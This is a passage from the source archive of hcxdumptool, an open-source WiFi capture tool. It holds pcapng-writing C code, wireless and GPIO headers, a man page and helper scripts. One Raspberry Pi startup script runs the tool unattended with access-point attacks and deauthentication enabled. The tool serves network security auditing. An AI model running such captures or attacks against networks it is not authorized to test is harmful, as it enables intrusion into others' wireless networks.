0x3cb87a, 0x487604, 0x48f317, 0x50e14a, 0x544e45, 0x580943, 0x586ed6, 0x5c6b4f, 0x609620, 0x68e166, 0x706f81, 0x78f944, 0x7ce4aa, 0x8c8401, 0x8ce748, 0x906f18, 0x980ee4, 0x9c93e4, 0xa468bc }; #define MYVENDORAP_SIZE sizeof(myvendorap) static const int myvendorclient[] = { 0xa4a6a9, 0xacde48, 0xb025aa, 0xb0ece1, 0xb0febd, 0xb4e1eb, 0xc02250, 0xc8aacc, 0xd85dfb, 0xdc7014, 0xe00db9, 0xe0cb1d, 0xe80410, 0xf04f7c, 0xf0a225, 0xfcc233 }; #define MYVENDORCLIENT_SIZE sizeof(myvendorclient) /*===========================================================================*/ hcxdumptool-6.2.5/include/pcap.c000066400000000000000000000241721415170014400166070ustar00rootroot00000000000000#define _GNU_SOURCE #include #include #include #include #include #include #include #include #include #include #include #include "pcap.h" /*===========================================================================*/ uint16_t addoption(uint8_t *posopt, uint16_t optioncode, uint16_t optionlen, char *option) { uint16_t padding; option_header_t *optionhdr; optionhdr = (option_header_t*)posopt; optionhdr->option_code = optioncode; optionhdr->option_length = optionlen; padding = (4 -(optionlen %4)) %4; memset(optionhdr->option_data, 0, optionlen +padding); memcpy(optionhdr->option_data, option, optionlen); return optionlen + padding +4; } /*===========================================================================*/ uint16_t addcustomoptionheader(uint8_t *pospt) { int colen; option_header_t *optionhdr; optionhdr = (option_header_t*)pospt; optionhdr->option_code = SHB_CUSTOM_OPT; colen = OH_SIZE; memcpy(pospt +colen, &hcxmagic, 4); colen += 4; memcpy(pospt +colen, &hcxmagic, 32); colen += 32; return colen; } /*===========================================================================*/ uint16_t addcustomoption(uint8_t *pospt, uint8_t *macap, uint64_t rcrandom, uint8_t *anonce, uint8_t *macsta, uint8_t *snonce, uint8_t wclen, char *wc) { int colen; option_header_t *optionhdr; optionfield64_t *of; optionhdr = (option_header_t*)pospt; optionhdr->option_code = SHB_CUSTOM_OPT; colen = OH_SIZE; memcpy(pospt +colen, &hcxmagic, 4); colen += 4; memcpy(pospt +colen, &hcxmagic, 32); colen += 32; colen += addoption(pospt +colen, OPTIONCODE_MACAP, 6, (char*)macap); of = (optionfield64_t*)(pospt +colen); of->option_code = OPTIONCODE_RC; of->option_length = 8; of->option_value = rcrandom; colen += 12; colen += addoption(pospt +colen, OPTIONCODE_ANONCE, 32, (char*)anonce); colen += addoption(pospt +colen, OPTIONCODE_MACCLIENT, 6, (char*)macsta); colen += addoption(pospt +colen, OPTIONCODE_SNONCE, 32, (char*)snonce); colen += addoption(pospt +colen, OPTIONCODE_WEAKCANDIDATE, wclen, wc); colen += addoption(pospt +colen, 0, 0, NULL); optionhdr->option_length = colen -OH_SIZE; return colen; } /*===========================================================================*/ bool writecb(int fd, struct sockaddr *address, int socketflags, uint8_t *macap, uint64_t rcrandom, uint8_t *anonce, uint8_t *macsta, uint8_t *snonce, uint8_t wclen, char *wc) { int cblen; int written; custom_block_t *cbhdr; optionfield64_t *of; total_length_t *totallength; uint8_t cb[2048]; memset(&cb, 0, 2048); cbhdr = (custom_block_t*)cb; cblen = CB_SIZE; cbhdr->block_type = CBID; cbhdr->total_length = CB_SIZE; memcpy(cbhdr->pen, &hcxmagic, 4); memcpy(cbhdr->hcxm, &hcxmagic, 32); cblen += addoption(cb +cblen, OPTIONCODE_MACAP, 6, (char*)macap); of = (optionfield64_t*)(cb +cblen); of->option_code = OPTIONCODE_RC; of->option_length = 8; of->option_value = rcrandom; cblen += 12; cblen += addoption(cb +cblen, OPTIONCODE_ANONCE, 32, (char*)anonce); cblen += addoption(cb +cblen, OPTIONCODE_MACCLIENT, 6, (char*)macsta); cblen += addoption(cb +cblen, OPTIONCODE_SNONCE, 32, (char*)snonce); cblen += addoption(cb +cblen, OPTIONCODE_WEAKCANDIDATE, wclen, wc); cblen += addoption(cb +cblen, 0, 0, NULL); totallength = (total_length_t*)(cb +cblen); cblen += TOTAL_SIZE; cbhdr->total_length = cblen; totallength->total_length = cblen; if(address == NULL) written = write(fd, &cb, cblen); else written = sendto(fd, &cb, cblen, socketflags, (struct sockaddr*)&address, sizeof(address)); if(written != cblen) { close(fd); return false; } return true; } /*===========================================================================*/ bool writeisb(int fd, uint32_t interfaceid, uint64_t starttimestamp, uint64_t incomming) { int written; struct timeval tvend; uint64_t endtimestamp; interface_statistics_block_t *isbhdr; uint8_t isb[1024]; memset(&isb, 0, 256); isbhdr = (interface_statistics_block_t*)isb; isbhdr->block_type = ISBID; isbhdr->total_length = ISB_SIZE; isbhdr->interface_id = interfaceid; gettimeofday(&tvend, NULL); endtimestamp = ((uint64_t)tvend.tv_sec * 1000000) + tvend.tv_usec; isbhdr->timestamp_high = endtimestamp >> 32; isbhdr->timestamp_low = (uint32_t)endtimestamp &0xffffffff; isbhdr->code_starttime = ISB_STARTTIME; isbhdr->starttime_len = 8; isbhdr->starttime_timestamp_high = starttimestamp >> 32; isbhdr->starttime_timestamp_low = (uint32_t)starttimestamp &0xffffffff; isbhdr->code_endtime = ISB_ENDTIME; isbhdr->endtime_len = 8; isbhdr->endtime_timestamp_high = endtimestamp >> 32; isbhdr->endtime_timestamp_low = (uint32_t)endtimestamp &0xffffffff; isbhdr->code_recv = ISB_IFRECV; isbhdr->recv_len = 8; isbhdr->recv = incomming; isbhdr->code_ifdrop = ISB_IFDROP; isbhdr->ifdrop_len = 8; isbhdr->ifdrop = 0; isbhdr->code_filteraccept = ISB_FILTERACCEPT; isbhdr->filteraccept_len = 8; isbhdr->filteraccept = incomming; isbhdr->code_osdrop = ISB_OSDROP; isbhdr->osdrop_len = 8; isbhdr->osdrop = 0; isbhdr->code_usredliv = ISB_USRDELIV; isbhdr->usredliv_len = 8; isbhdr->usredliv = incomming; isbhdr->code_eoo = 0; isbhdr->eoo_len = 0; isbhdr->total_length_dup = ISB_SIZE; written = write(fd, &isb, ISB_SIZE); if(written != ISB_SIZE) { close(fd); return false; } return true; } /*===========================================================================*/ bool writeidb(int fd, struct sockaddr *address, int socketflags, uint8_t *macorig, char *interfacestr) { int idblen; int written; interface_description_block_t *idbhdr; total_length_t *totallength; char vendor[6]; char tr[1]; uint8_t idb[1024]; memset(&idb, 0, 256); idblen = IDB_SIZE; idbhdr = (interface_description_block_t*)idb; idbhdr->block_type = IDBID; idbhdr->linktype = DLT_IEEE802_11_RADIO; idbhdr->reserved = 0; idbhdr->snaplen = PCAPNG_MAXSNAPLEN; idblen += addoption(idb +idblen, IF_NAME, strlen(interfacestr), interfacestr); memset(&vendor, 0, 6); memcpy(&vendor, macorig, 3); idblen += addoption(idb +idblen, IF_MACADDR, 6, vendor); tr[0] = TSRESOL_USEC; idblen += addoption(idb +idblen, IF_TSRESOL, 1, tr); idblen += addoption(idb +idblen, SHB_EOC, 0, NULL); totallength = (total_length_t*)(idb +idblen); idblen += TOTAL_SIZE; idbhdr->total_length = idblen; totallength->total_length = idblen; if(address == NULL) written = write(fd, &idb, idblen); else written = sendto(fd, &idb, idblen, socketflags, (struct sockaddr*)&address, sizeof(address)); if(written != idblen) { close(fd); return false; } return true; } /*===========================================================================*/ bool writeshb(int fd, struct sockaddr *address, int socketflags, uint8_t *macap, uint64_t rcrandom, uint8_t *anonce, uint8_t *macsta, uint8_t *snonce, uint8_t wclen, char *wc) { int shblen; int written; section_header_block_t *shbhdr; total_length_t *totallength; struct utsname unameData; char sysinfo[256]; uint8_t shb[1024]; memset(&shb, 0, 256); shblen = SHB_SIZE; shbhdr = (section_header_block_t*)shb; shbhdr->block_type = PCAPNGBLOCKTYPE; shbhdr->byte_order_magic = PCAPNGMAGICNUMBER; shbhdr->major_version = PCAPNG_MAJOR_VER; shbhdr->minor_version = PCAPNG_MINOR_VER; shbhdr->section_length = -1; if(uname(&unameData) == 0) { shblen += addoption(shb +shblen, SHB_HARDWARE, strlen(unameData.machine), unameData.machine); sprintf(sysinfo, "%s %s", unameData.sysname, unameData.release); shblen += addoption(shb +shblen, SHB_OS, strlen(sysinfo), sysinfo); sprintf(sysinfo, "hcxdumptool %s", VERSION_TAG); shblen += addoption(shb +shblen, SHB_USER_APPL, strlen(sysinfo), sysinfo); } shblen += addcustomoption(shb +shblen, macap, rcrandom, anonce, macsta, snonce, wclen, wc); shblen += addoption(shb +shblen, SHB_EOC, 0, NULL); totallength = (total_length_t*)(shb +shblen); shblen += TOTAL_SIZE; shbhdr->total_length = shblen; totallength->total_length = shblen; if(address == NULL) written = write(fd, &shb, shblen); else written = sendto(fd, &shb, shblen, socketflags, (struct sockaddr*)&address, sizeof(address)); if(written != shblen) { close(fd); return false; } return true; } /*===========================================================================*/ int hcxcreatepcapngdump(char *pcapngdumpname, uint8_t *macorig, char *interfacestr, uint8_t *macap, uint64_t rc, uint8_t *anonce, uint8_t *macsta, uint8_t *snonce, uint8_t wclen, char *wc) { int c; int fd; struct stat statinfo; char newpcapngoutname[PATH_MAX +2]; c = 0; strncpy(newpcapngoutname, pcapngdumpname, PATH_MAX); while(stat(newpcapngoutname, &statinfo) == 0) { snprintf(newpcapngoutname, PATH_MAX, "%s-%d", pcapngdumpname, c); c++; } umask(0); fd = open(newpcapngoutname, O_WRONLY | O_CREAT, 0644); if(fd == -1) { return -1; } if(writeshb(fd, NULL, 0, macap, rc, anonce, macsta, snonce, wclen, wc) == false) { return -1; } if(writeidb(fd, NULL, 0, macorig, interfacestr) == false) { return -1; } if(writecb(fd, NULL, 0, macap, rc, anonce, macsta, snonce, wclen, wc) == false) { return -1; } return fd; } /*===========================================================================*/ int hcxcreatepcapngdumpfd(int fd, uint8_t *macorig, char *interfacestr, uint8_t *macap, uint64_t rc, uint8_t *anonce, uint8_t *macsta, uint8_t *snonce, uint8_t wclen, char *wc) { if(fd == -1) { return -1; } if(writeshb(fd, NULL, 0, macap, rc, anonce, macsta, snonce, wclen, wc) == false) { return -1; } if(writeidb(fd, NULL, 0, macorig, interfacestr) == false) { return -1; } if(writecb(fd, NULL, 0, macap, rc, anonce, macsta, snonce, wclen, wc) == false) { return -1; } return fd; } /*===========================================================================*/ int hcxcreatepcapngdumpfdsocket(int fd, struct sockaddr *address, uint8_t *macorig, char *interfacestr, uint8_t *macap, uint64_t rc, uint8_t *anonce, uint8_t *macsta, uint8_t *snonce, uint8_t wclen, char *wc) { if(fd == -1) { return -1; } if(writeshb(fd, address, MSG_MORE, macap, rc, anonce, macsta, snonce, wclen, wc) == false) { return -1; } if(writeidb(fd, address, MSG_MORE, macorig, interfacestr) == false) { return -1; } if(writecb(fd, address, 0, macap, rc, anonce, macsta, snonce, wclen, wc) == false) { return -1; } return fd; } /*===========================================================================*/ hcxdumptool-6.2.5/include/pcap.h000066400000000000000000000215621415170014400166140ustar00rootroot00000000000000#define PCAPMAGICNUMBER 0xa1b2c3d4 #define PCAPMAGICNUMBERBE 0xd4c3b2a1 #define PCAPNGBLOCKTYPE 0x0a0d0d0a #define PCAPNGMAGICNUMBER 0x1a2b3c4d #define PCAPNGMAGICNUMBERBE 0x4d3c2b1a #define PCAPNG_MAJOR_VER 1 #define PCAPNG_MINOR_VER 0 #define PCAPNG_MAXSNAPLEN 0xffff /*===========================================================================*/ /* Section Header Block (SHB) - ID 0x0A0D0D0A */ struct section_header_block_s { uint32_t block_type; /* block type */ uint32_t total_length; /* block length */ uint32_t byte_order_magic; /* byte order magic - indicates swapped data */ uint16_t major_version; /* major version of pcapng (1 atm) */ uint16_t minor_version; /* minor version of pcapng (0 atm) */ int64_t section_length; /* length of section - can be -1 (parsing necessary) */ } __attribute__((__packed__)); typedef struct section_header_block_s section_header_block_t; #define SHB_SIZE (sizeof(section_header_block_t)) /*===========================================================================*/ /* Header of all pcapng blocks */ struct block_header_s { uint32_t block_type; /* block type */ uint32_t total_length; /* block length */ } __attribute__((__packed__)); typedef struct block_header_s block_header_t; #define BH_SIZE (sizeof(block_header_t)) /*===========================================================================*/ /* total lenght*/ struct total_length_s { uint32_t total_length; } __attribute__((__packed__)); typedef struct total_length_s total_length_t; #define TOTAL_SIZE (sizeof(total_length_t)) /*===========================================================================*/ /* Header of all pcapng options */ struct option_header_s { #define SHB_EOC 0 #define SHB_COMMENT 1 #define SHB_HARDWARE 2 #define SHB_OS 3 #define SHB_USER_APPL 4 #define SHB_CUSTOM_OPT 0x0bad #define IF_NAME 2 #define IF_DESCRIPTION 3 #define IF_MACADDR 6 #define IF_TSRESOL 9 #define IF_TZONE 10 #define TSRESOL_USEC 6 #define TSRESOL_NSEC 9 /* custom option code */ #define OPTIONCODE_MACORIG 0xf29a #define OPTIONCODE_MACAP 0xf29b #define OPTIONCODE_RC 0xf29c #define OPTIONCODE_ANONCE 0xf29d #define OPTIONCODE_MACCLIENT 0xf29e #define OPTIONCODE_SNONCE 0xf29f #define OPTIONCODE_WEAKCANDIDATE 0xf2a0 #define OPTIONCODE_NMEA 0xf2a1 uint16_t option_code; /* option code - depending of block (0 - end of opts, 1 - comment are in common) */ uint16_t option_length; /* option length - length of option in bytes (will be padded to 32bit) */ char option_data[1]; } __attribute__((__packed__)); typedef struct option_header_s option_header_t; #define OH_SIZE offsetof(option_header_t, option_data) /*===========================================================================*/ /* Option Field */ struct optionfield64_s { uint16_t option_code; uint16_t option_length; uint64_t option_value; } __attribute__((__packed__)); typedef struct optionfield64_s optionfield64_t; #define OPTIONFIELD64_SIZE (sizeof(optionfield64_t)) /*===========================================================================*/ /* Interface Description Block (IDB) - ID 0x00000001 */ struct interface_description_block_s { uint32_t block_type; /* block type */ #define IDBID 0x00000001 uint32_t total_length; /* block length */ uint16_t linktype; /* the link layer type (was -network- in classic pcap global header) */ #define DLT_IEEE802_11_RADIO 127 uint16_t reserved; /* 2 bytes of reserved data */ uint32_t snaplen; /* maximum number of bytes dumped from each packet (was -snaplen- in classic pcap global header */ } __attribute__((__packed__)); typedef struct interface_description_block_s interface_description_block_t; #define IDB_SIZE (sizeof(interface_description_block_t)) /*===========================================================================*/ /* Packet Block (PB) - ID 0x00000002 (OBSOLETE - EPB should be used instead) */ struct packet_block_s { uint32_t block_type; /* block type */ #define PBID 0x00000002 uint32_t total_length; /* block length */ uint16_t interface_id; /* the interface the packet was captured from - identified by interface description block in current section */ uint16_t drops_count; /* packet dropped by IF and OS since prior packet */ uint32_t timestamp_high; /* high bytes of timestamp */ uint32_t timestamp_low; /* low bytes of timestamp */ uint32_t cap_len; /* length of packet in the capture file (was -incl_len- in classic pcap packet header) */ uint32_t org_len; /* length of packet when transmitted (was -orig_len- in classic pcap packet header) */ } __attribute__((__packed__)); typedef struct packet_block_s packet_block_t; #define PB_SIZE (sizeof(packet_block_t)) /*===========================================================================*/ /* Simple Packet Block (SPB) - ID 0x00000003 */ struct simple_packet_block_s { uint32_t block_type; /* block type */ #define SPBID 0x00000003 uint32_t total_length; /* block length */ uint32_t original_len; /* length of packet when transmitted (was -orig_len- in classic pcap packet header) */ } __attribute__((__packed__)); typedef struct simple_packet_block_s simple_packet_block_t; #define SPB_SIZE (sizeof(simple_packet_block_t)) /*===========================================================================*/ /* Name Resolution Block (NRB) - ID 0x00000004 */ struct name_resolution_block_s { uint32_t block_type; /* block type */ #define NRBID 0x00000004 uint32_t total_length; /* block length */ uint16_t record_type; /* type of record (ipv4 / ipv6) */ uint16_t record_length; /* length of record value */ } __attribute__((__packed__)); typedef struct name_resolution_block_s name_resolution_block_t; #define NRB_SIZE (sizeof(name_resolution_block_t)) /*===========================================================================*/ /* Interface Statistics Block - ID 0x00000005 */ struct interface_statistics_block_s { uint32_t block_type; /* block type */ #define ISBID 0x00000005 uint32_t total_length; /* block length */ uint32_t interface_id; /* the interface the stats refer to - identified by interface description block in current section */ uint32_t timestamp_high; /* high bytes of timestamp */ uint32_t timestamp_low; /* low bytes of timestamp */ #define ISB_STARTTIME 2 #define ISB_ENDTIME 3 #define ISB_IFRECV 4 #define ISB_IFDROP 5 #define ISB_FILTERACCEPT 6 #define ISB_OSDROP 7 #define ISB_USRDELIV 8 uint16_t code_starttime; uint16_t starttime_len; uint32_t starttime_timestamp_high; /* high bytes of timestamp */ uint32_t starttime_timestamp_low; /* low bytes of timestamp */ uint16_t code_endtime; uint16_t endtime_len; uint32_t endtime_timestamp_high; /* high bytes of timestamp */ uint32_t endtime_timestamp_low; /* low bytes of timestamp */ uint16_t code_recv; uint16_t recv_len; uint64_t recv; uint16_t code_ifdrop; uint16_t ifdrop_len; uint64_t ifdrop; uint16_t code_filteraccept; uint16_t filteraccept_len; uint64_t filteraccept; uint16_t code_osdrop; uint16_t osdrop_len; uint64_t osdrop; uint16_t code_usredliv; uint16_t usredliv_len; uint64_t usredliv; uint16_t code_eoo; uint16_t eoo_len; uint32_t total_length_dup; /* block length */ } __attribute__((__packed__)); typedef struct interface_statistics_block_s interface_statistics_block_t; #define ISB_SIZE (sizeof(interface_statistics_block_t)) /*===========================================================================*/ /* Enhanced Packet Block (EPB) - ID 0x00000006 */ struct enhanced_packet_block_s { uint32_t block_type; /* block type */ #define EPBID 0x00000006 uint32_t total_length; /* block length */ uint32_t interface_id; /* the interface the packet was captured from - identified by interface description block in current section */ uint32_t timestamp_high; /* high bytes of timestamp */ uint32_t timestamp_low; /* low bytes of timestamp */ uint32_t cap_len; /* length of packet in the capture file (was -incl_len- in classic pcap packet header) */ uint32_t org_len; /* length of packet when transmitted (was -orig_len- in classic pcap packet header) */ } __attribute__((__packed__)); typedef struct enhanced_packet_block_s enhanced_packet_block_t; #define EPB_SIZE (sizeof(enhanced_packet_block_t)) /*===========================================================================*/ /* Custom Block (CB) - ID 0x00000bad */ struct custom_block_s { uint32_t block_type; /* block type */ #define CBID 0x00000bad uint32_t total_length; /* block length */ uint8_t pen[4]; /* Private Enterprise Number */ uint8_t hcxm[32]; /* hcxdumptool magic number */ uint8_t data[1]; } __attribute__((__packed__)); typedef struct custom_block_s custom_block_t; #define CB_SIZE offsetof (custom_block_t, data) uint8_t hcxmagic[] = { 0x2a, 0xce, 0x46, 0xa1, 0x79, 0xa0, 0x72, 0x33, 0x83, 0x37, 0x27, 0xab, 0x59, 0x33, 0xb3, 0x62, 0x45, 0x37, 0x11, 0x47, 0xa7, 0xcf, 0x32, 0x7f, 0x8d, 0x69, 0x80, 0xc0, 0x89, 0x5e, 0x5e, 0x98 }; #define HCXMAGIC_SIZE (sizeof(hcxmagic)) /*===========================================================================*/ hcxdumptool-6.2.5/include/rpigpio.h000066400000000000000000000007741415170014400173440ustar00rootroot00000000000000#define GPIO_LED_DELAY 100000000 #define GPIO_PERI_BASE_OLD 0x20000000 #define GPIO_PERI_BASE_NEW 0x3F000000 #define GPIO_BASE 0x200000 #define PAGE_SIZE (4*1024) #define BLOCK_SIZE (4*1024) #define INP_GPIO(g) *(gpio +((g) /10)) &= ~(7 << (((g) %10) *3)) #define OUT_GPIO(g) *(gpio +((g) /10)) |= (1 << (((g) %10) *3)) #define GPIO_SET *(gpio +7) #define GPIO_CLR *(gpio +10) #define GET_GPIO(g) (*(gpio +13) & (1 << g)) static int rpirevision; static void *gpio_map; static volatile unsigned *gpio; hcxdumptool-6.2.5/include/strings.c000066400000000000000000000041171415170014400173520ustar00rootroot00000000000000/*===========================================================================*/ bool isasciistring(int len, uint8_t *buffer) { uint8_t p; for(p = 0; p < len; p++) { if((buffer[p] < 0x20) || (buffer[p] > 0x7e)) return false; } return true; } /*===========================================================================*/ bool ishexvalue(const char *str, size_t len) { size_t c; for(c = 0; c < len; c++) { if(str[c] < '0') return false; if(str[c] > 'f') return false; if((str[c] > '9') && (str[c] < 'A')) return false; if((str[c] > 'F') && (str[c] < 'a')) return false; } return true; } /*===========================================================================*/ bool hex2bin(const char *str, uint8_t *bytes, size_t blen) { size_t pos; uint8_t idx0; uint8_t idx1; uint8_t hashmap[] = { 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, // 01234567 0x08, 0x09, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // 89:;<=>? 0x00, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f, 0x00, // @ABCDEFG 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // HIJKLMNO 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // PQRSTUVW 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // XYZ[\]^_ 0x00, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f, 0x00, // `abcdefg 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // hijklmno }; if(ishexvalue(str, blen) == false) return false; memset(bytes, 0, blen); for(pos = 0; ((pos < (blen*2)) && (pos < strlen(str))); pos += 2) { idx0 = ((uint8_t)str[pos+0] & 0x1F) ^ 0x10; idx1 = ((uint8_t)str[pos+1] & 0x1F) ^ 0x10; bytes[pos/2] = (uint8_t)(hashmap[idx0] << 4) | hashmap[idx1]; }; return true; } /*===========================================================================*/ size_t ishexify(const char *string) { size_t len; len = strlen(string); if (len < 6) return 0; if ((len &1) == 1) return 0; if (string[0] != '$') return 0; if (string[1] != 'H') return 0; if (string[2] != 'E') return 0; if (string[3] != 'X') return 0; if (string[4] != '[') return 0; if (string[len -1] != ']') return 0; return (len -6)/2; } /*===========================================================================*/ hcxdumptool-6.2.5/include/wireless-lite.h000066400000000000000000000030441415170014400204540ustar00rootroot00000000000000#ifndef WIRELESS_LITE_H #define WIRELESS_LITE_H /* cleaned up from linux/wireless.h */ #include #define SIOCGIWNAME 0x8b01 #define SIOCSIWFREQ 0x8b04 #define SIOCGIWFREQ 0x8b05 #define SIOCSIWMODE 0x8b06 #define SIOCGIWMODE 0x8b07 #define SIOCGIWTXPOW 0x8b27 #define SIOCSIWPOWER 0x8B2C #define SIOCGIWPOWER 0x8B2D #define IW_TXPOW_DBM 0x00 #define IW_TXPOW_MWATT 0x01 #define IW_FREQ_FIXED 0x01 #define IW_TXPOW_RELATIVE 0x02 #define IW_MODE_AUTO 0 #define IW_MODE_ADHOC 1 #define IW_MODE_INFRA 2 #define IW_MODE_MASTER 3 #define IW_MODE_REPEAT 4 #define IW_MODE_SECOND 5 #define IW_MODE_MONITOR 6 #define IW_MODE_MESH 7 struct iw_quality { unsigned char qual; unsigned char level; unsigned char noise; unsigned char updated; }; struct iw_param { int value; unsigned char fixed; unsigned char disabled; unsigned short flags; }; struct iw_point { void *pointer; unsigned short length; unsigned short flags; }; struct iw_freq { int m; short e; unsigned char i; unsigned char flags; }; union iwreq_data { char name[IFNAMSIZ]; struct iw_point essid; struct iw_param nwid; struct iw_freq freq; struct iw_param sens; struct iw_param bitrate; struct iw_param txpower; struct iw_param rts; struct iw_param frag; unsigned mode; struct iw_param retry; struct iw_point encoding; struct iw_param power; struct iw_quality qual; struct sockaddr ap_addr; struct sockaddr addr; struct iw_param param; struct iw_point data; }; struct iwreq { union { char ifrn_name[IFNAMSIZ]; } ifr_ifrn; union iwreq_data u; }; #endif hcxdumptool-6.2.5/jni/000077500000000000000000000000001415170014400146475ustar00rootroot00000000000000hcxdumptool-6.2.5/jni/Application.mk000066400000000000000000000000731415170014400174430ustar00rootroot00000000000000APP_PLATFORM := android-21 APP_BUILD_SCRIPT := Android.mk hcxdumptool-6.2.5/license.txt000066400000000000000000000020711415170014400162520ustar00rootroot00000000000000The MIT License (MIT) Copyright (c) 2000-2021 ZeroBeat Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. hcxdumptool-6.2.5/man/000077500000000000000000000000001415170014400146425ustar00rootroot00000000000000hcxdumptool-6.2.5/man/hcxdumptool.1000066400000000000000000000015341415170014400172750ustar00rootroot00000000000000.\" Manpage for hcxdumptool. .\" Contact https://github.com/ZerBea to correct errors or typos. .TH man 1 "23 October 2021" "1.0" "hcxdumptool man page" .SH NAME hcxtools .SH DESCRIPTION Small tool to capture packets from wlan devices and to detect weak points within own WiFi networks. .SH TOOLS .nf | hcxdumptool | Tool to run several tests to determine if ACCESS POINTs or CLIENTs are vulnerable | | hcxpioff | Turns Raspberry Pi off via GPIO switch | .SH OPTIONS help menu (-h or --help) of each tool will list all available options .SH RELATED TOOLS hcxpcapngtool, hcxhashtool, hcxpsktool, hcxpmktool, hcxeiutool, hcxwltool, hcxhash2cap, whoismac, wlancap2wpasec, wlangenpmk, wlangenpmkocl .SH BUGS no known bugs. .SH AUTHOR ZeroBeat (https://github.com/ZerBea) hcxdumptool-6.2.5/usefulscripts/000077500000000000000000000000001415170014400170025ustar00rootroot00000000000000hcxdumptool-6.2.5/usefulscripts/bash_profile000077500000000000000000000012731415170014400213700ustar00rootroot00000000000000#!/bin/bash cd /home export WLANDEV=`ls -1 /sys/class/net | grep ^wl` if [[ ! -z $WLANDEV ]] then ARCHIVNAME=`date +'%Y%m%d%H%M'` /opt/vc/bin/tvservice -o hcxdumptool --gpio_button=4 --gpio_statusled=17 -i $WLANDEV -f 79 -o $ARCHIVNAME.pcapng --poweroff --stop_ap_attacks=6000 --resume_ap_attacks=12000 --active_beacon # hcxdumptool --gpio_button=4 --gpio_statusled=17 -i $WLANDEV -o $ARCHIVNAME.pcapng --tot=1440 --disable_deauthentication --disable_ap_attacks --active_beacon -c 1,3,5,7,9,11,2,4,6,8,10 -t 60 hcxret=$? if [ $hcxret -eq 2 ] then reboot else poweroff fi fi systemctl start dhcpcd@eth0.service systemctl start sshd.service hcxpioff --gpio_button=4 --gpio_statusled=17 & hcxdumptool-6.2.5/usefulscripts/killmonnb000077500000000000000000000010171415170014400207140ustar00rootroot00000000000000#!/bin/sh if test -z "$1" then for IFACE in `ls -1 /sys/class/net | grep ^wl` do printf "$IFACE " cat /sys/class/net/$IFACE/address done printf "\nelect WLAN interface: " read WLANDEV else WLANDEV=$1 fi echo "deactivating monitor mode on $WLANDEV" sudo ip link set $WLANDEV down sudo iw dev $WLANDEV set type managed sudo ip link set $WLANDEV up sudo iw dev $WLANDEV info echo "activating NetworkManager and wpa_supplicant" sudo systemctl start NetworkManager.service sudo systemctl start wpa_supplicant.service hcxdumptool-6.2.5/usefulscripts/makemonnb000077500000000000000000000010161415170014400206750ustar00rootroot00000000000000#!/bin/sh if test -z "$1" then for IFACE in `ls -1 /sys/class/net | grep ^wl` do printf "$IFACE " cat /sys/class/net/$IFACE/address done printf "\nselect WLAN interface: " read WLANDEV else WLANDEV=$1 fi echo "deactivating NetworkManager and wpa_supplicant" sudo systemctl stop NetworkManager.service sudo systemctl stop wpa_supplicant.service echo "activating monitor mode on $WLANDEV" sudo ip link set $WLANDEV down sudo iw dev $WLANDEV set type monitor sudo ip link set $WLANDEV up sudo iw dev $WLANDEV info hcxdumptool-6.2.5/usefulscripts/pireadcard000077500000000000000000000011251415170014400210250ustar00rootroot00000000000000#!/bin/bash lsblk printf "\nchoose device: " read DEVICE sudo fsck /dev/"$DEVICE"1 sudo fsck /dev/"$DEVICE"2 if [ -f "rpiboot.tgz" ] then rm -f rpiboot.tgz fi if [ -f "rpiroot.tgz" ] then rm -f rpiroot.tgz fi echo "mount boot" if [ ! -d "boot" ] then mkdir boot fi sudo mount /dev/"$DEVICE"1 boot cd boot sudo tar -zcvf ../rpiboot.tgz . sync cd .. echo "mount root" if [ ! -d "root" ] then mkdir root fi sudo mount /dev/"$DEVICE"2 root cd root sudo tar --exclude=var/log --exclude=lost+found -zcvpf ../rpiroot.tgz . sync cd .. sudo umount boot sudo umount root rm -r boot rm -r root hcxdumptool-6.2.5/usefulscripts/piwritecard000077500000000000000000000011651415170014400212500ustar00rootroot00000000000000#!/bin/bash lsblk printf "\nchoose device: " read DEVICE printf "\033[0;31m o p n p 1 +128M t c n p 2 w \033[1;0m\n" sudo fdisk /dev/$DEVICE echo "erstelle Filesystem boot" sudo mkfs.fat -F32 /dev/"$DEVICE"1 echo "erstelle Filesystem root" sudo mkfs.ext4 /dev/"$DEVICE"2 echo "mount boot" if [ ! -d "boot" ] then mkdir boot fi sudo mount /dev/"$DEVICE"1 boot cd boot sudo tar -zxvf ../rpiboot.tgz sync cd .. echo "mount root" if [ ! -d "root" ] then mkdir root fi sudo mount /dev/"$DEVICE"2 root cd root sudo tar -zxvf ../rpiroot.tgz sync cd .. sudo umount boot sudo umount root rm -r boot rm -r root